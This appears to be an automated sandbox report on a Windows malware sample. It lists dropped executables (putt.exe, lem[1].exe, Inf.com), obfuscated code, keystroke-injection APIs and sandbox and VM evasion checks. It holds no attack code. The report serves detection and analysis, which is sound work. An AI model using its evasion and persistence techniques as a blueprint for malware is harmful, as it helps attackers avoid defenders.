Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: cryptosetup.pdbGCTL source: Inf.com, 00000012.00000002.3022504782.0000000004CAC000.00000004.00000800.00020000.00000000.sdmp, Q9R1NG.18.dr
Source:	Binary string: cryptosetup.pdb source: Inf.com, 00000012.00000002.3022504782.0000000004CAC000.00000004.00000800.00020000.00000000.sdmp, Q9R1NG.18.dr

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 5_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

5_2_00406328

PE file contains an invalid checksum

Source: putt.exe.0.dr	Static PE information: real checksum: 0x13b848 should be: 0x144e84
Source: lem[1].exe.0.dr	Static PE information: real checksum: 0x13b848 should be: 0x144e84

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AE7D2A5 pushad ; iretd	0_2_00007FFD9AE7D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AF97964 push ebx; retf	0_2_00007FFD9AF9796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AF900BD pushad ; iretd	0_2_00007FFD9AF900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AF9291D push E95DB9EFh; ret	0_2_00007FFD9AF92939
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AF90953 push E95790D0h; ret	0_2_00007FFD9AF909C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B06438B push esi; iretd	0_2_00007FFD9B0643A7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B063DC1 pushad ; retf	0_2_00007FFD9B063DE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B063DE2 pushad ; retf	0_2_00007FFD9B063DE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B0677E1 push cs; retf	0_2_00007FFD9B0677E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C0DE6 push ecx; ret	18_2_008C0DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Jump to dropped file

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File created: C:\ProgramData\4O8YUSJEUA1N\Q9R1NG	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\putt.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

File created: C:\ProgramData\4O8YUSJEUA1N\Q9R1NG

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

File created: C:\ProgramData\4O8YUSJEUA1N\Q9R1NG

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_009326DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		18_2_009326DD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008BFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		18_2_008BFC7C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp

Contains functionality to detect virtual machines (SLDT)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_00007FFD9B061009 sldt word ptr [eax]

0_2_00007FFD9B061009

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5196			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4654			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Dropped PE file which has not been started: C:\ProgramData\4O8YUSJEUA1N\Q9R1NG

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

API coverage: 3.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
